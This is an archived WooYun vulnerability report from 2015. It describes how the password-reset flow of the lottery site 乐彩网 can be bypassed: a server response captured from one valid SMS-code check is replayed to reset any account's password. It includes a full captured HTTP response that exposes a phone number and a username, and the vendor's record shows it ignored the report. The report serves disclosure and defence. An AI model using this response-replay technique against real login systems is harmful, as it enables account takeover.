乐彩网重置任意用户密码漏洞 | wooyun-2015-0100653| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100653

漏洞标题：乐彩网重置任意用户密码漏洞

漏洞作者：恋锋

提交时间：2015-03-11 14:25

修复时间：2015-03-16 14:26

公开时间：2015-03-16 14:26

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-11：细节已通知厂商并且等待厂商处理中
2015-03-16：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

乐彩网于2004年成立，服务我国公益彩票事业，存在重置任意用户密码漏洞，影响整个系统账户业务安全，危害还是蛮大的，希望给个高rank！！！

详细说明：

1、测试时发现在校验短信码处存在绕过漏洞，导致可轻易重置任意账号密码。
2、首先使用已知手机号进行一次正常的找回密码操作，记录短信码成功通过验证时返回的响应包，如下：

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 Mar 2015 04:33:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
X-Powered-By: ThinkPHP
Content-Length: 6298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>设置新密码 - 忘记密码 - 乐彩网 - 原创+专业+人气旺,踏实服务我国彩票公益事业(原网址www.17500.net被盗,请当心受骗)</title>
    <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/Common/css/reset.css?20150104" />
    <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/Common/css/common.css?20150104" />
    <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/User/css/user.css?20150104" />
    <link rel="stylesheet" type="text/css" media="all" href="https://passport.17500.cn/Public/User/css/index.css?20150104" />
    <script src="https://passport.17500.cn/Public/Common/js/jquery.min.js?20150104"></script>
    <script src="https://passport.17500.cn/Public/Common/js/common.js?20150104"></script>
	<script src="https://passport.17500.cn/Public/User/js/user.js?20150104" charset="utf-8"></script>
</head>
<body><div id="header">
	<em>
					<a href="http://www.17500.cn" target="_blank">乐彩网首页</a>&nbsp;|&nbsp;			<a href="http://bbs.17500.cn" target="_blank">乐彩论坛</a>&nbsp;|&nbsp;			<a href="http://lebi.17500.cn" target="_blank">乐币点播</a>&nbsp;|&nbsp;			<a href="http://sp.17500.cn" target="_blank">短信点播</a>&nbsp;|&nbsp;			<a href="http://tb.tuganjue.com" target="_blank">图感觉图表</a>&nbsp;|&nbsp;			<a href="http://taihu.17500.cn" target="_blank">太湖钓叟字谜</a>	</em>
	<a href="https://passport.17500.cn/index/index.html"  id="logo">乐彩网</a>
    <b>忘记密码</b>
</div><div id="section">
	<div class="register fixed">
    	<div class="l">
    		<form action="https://passport.17500.cn/forgot/step2.html" method="POST" onsubmit="return user.forgot.submitchk2()">
	        	<ul id="forgot_form">
		        	<div class="fi">
	                	<p class="t">正在操作的手机号为：<b>13828840869</b></p>
	                    <p class="c">请在以下选项中选择要找回密码的用户名</p>
	                    <p class="b">
	                    	<label for="uid_1246317" class="on" onclick="user.common.selectUser(this)">
									<i><input type="radio" id="uid_1246317" name="uid" value="1246317" checked="true" /></i>
									kevin219								</label>						</p>
	                </div>
	                <li>
	                	<input name="pwd" class="txtin tw3 i2" type="text" value="密码" readonly="readonly" />
	                	<input name="password" class="txtin tw3 i2" type="password" style="display: none;" />
	                    <p class="ti">请重新设置一个复杂的密码！</p>
	                </li>
	                <li>
	                	<input name="pwd2" class="txtin tw3 i5" type="text" value="重复密码" readonly="readonly" />
	                	<input name="password2" class="txtin tw3 i5" type="password" style="display: none;" />
	                    <p class="ti">请再输入一次您刚刚设置的密码！</p>
	                </li>
	                <li>
						<em class="yz fr">
							<img id="verify_code" src="https://passport.17500.cn/code/index/rand/4703.html" onclick="user.common.changeverify(this)" />
						</em>
						<input name="verify" class="txtin tw4 i3" type="text" autocomplete="off" value="验证码" />
	                    <p class="ti">请填写右边图片中的验证码！</p>
					</li>
					<li>
						<label for="resetsecquess" class="twn">
							清空安全提问
							<input type="checkbox" name="resetsecquess" id="resetsecquess" value="1" style="height:0; overflow:hidden; border:0; width: 0;"/>
						</label>
					</li>
	                <li><input name="submit" type="submit" class="inb" value="提&nbsp;&nbsp;交" /></li>
	            </ul>
			</form>
        </div>
        <div class="r">
            <p class="fg2"><b>联系我们</b></p>
            <div class="hz3">
            	<a href="http://wpa.qq.com/msgrd?v=3&uin=4008017500&site=qq&menu=yes" target="_blank" class="hz11"><i></i>4008017500</a>
                <a href="javascript:void(0)" class="hz12"><i></i>400-80-17500</a>
            </div>
        </div>
    </div>
</div>
<script type="text/javascript">
	$(function(){
		user.common.focusBlur($('#forgot_form'));
		user.common.verifyurl = "https://passport.17500.cn/check/verify.html";
		user.common.passwordurl = "https://passport.17500.cn/check/password.html";
		user.common.password2url = "https://passport.17500.cn/check/password2.html";
		$('input[name=password]').blur(function(){
			user.common.passwordchk();
		});
		$('input[name=password2]').blur(function(){
			user.common.password2chk();
		});
		$('input[name=verify]').blur(function(){
			user.common.verifychk();
		});
	 	$(':checkbox[name=resetsecquess]').change(function(){
	 		user.forgot.changecheck(this);
	 	});
	});
</script><div id="footer">
	<p>
					<a href="http://www.17500.cn/home/aboutus.php" target="_blank">关于乐彩网</a>丨			<a href="http://www.17500.cn/zhaopin/index.php" target="_blank">人才招聘</a>丨			<a href="http://www.17500.cn/home/vipright.php" target="_blank">服务说明</a>丨			<a href="http://www.17500.cn/pay/" target="_blank">支付方式</a>丨			<a href="http://www.17500.cn/home/contactus.php" target="_blank">联系方式</a>丨			<a href="http://www.17500.cn/comment/contact.php" target="_blank">在线沟通</a>丨			<a href="https://passport.17500.cn/index/index.html" target="">用户中心</a>丨			<a href="http://www.17500.cn/home/map.php" target="_blank">网站地图</a>丨			<a href="http://www.17500.cn" target="_blank">返回首页</a>	</p>
    快乐博彩，尽在乐彩<br/>
	© 2004-2015 版权所有&nbsp;&nbsp;&nbsp;&nbsp;京ICP备13046446号|京公网安备11011202001644号&nbsp;&nbsp;&nbsp;&nbsp;<script type="text/javascript" src="https://tajs.qq.com/stats?sId=37761611" charset="UTF-8"></script><br/>
    <img src="https://passport.17500.cn/Public/User/img/kx.gif" alt=""/>&nbsp;&nbsp;&nbsp;&nbsp;<img src="https://passport.17500.cn/Public/User/img/cx.gif" alt=""/>
</div>	</body>
</html>

3、再做一次找回密码操作，如下图，下发短信码后，输入任意短信码（此处为123456），提交校验请求

4、可以看到响应提示短信码错误

5、用第一次重置密码操作得到的响应包替代此处，如下

6、释放请求后，成功进入重置密码页面，重置密码为：1111qqqq

7、重置密码成功，可利用该密码成功登录系统

漏洞证明：

见漏洞详细说明

修复方案：

完善认证机制，在前端和服务端同时校验

版权声明：转载请注明来源恋锋@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-03-16 14:26

厂商回复：

漏洞Rank：20 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100653

漏洞标题：乐彩网重置任意用户密码漏洞

相关厂商：乐彩网

漏洞作者：恋锋

提交时间：2015-03-11 14:25

修复时间：2015-03-16 14:26

公开时间：2015-03-16 14:26

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源恋锋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0100653

漏洞标题：乐彩网重置任意用户密码漏洞

相关厂商：乐彩网

漏洞作者： 恋锋

提交时间：2015-03-11 14:25

修复时间：2015-03-16 14:26

公开时间：2015-03-16 14:26

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0100653"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 恋锋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：恋锋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源恋锋@乌云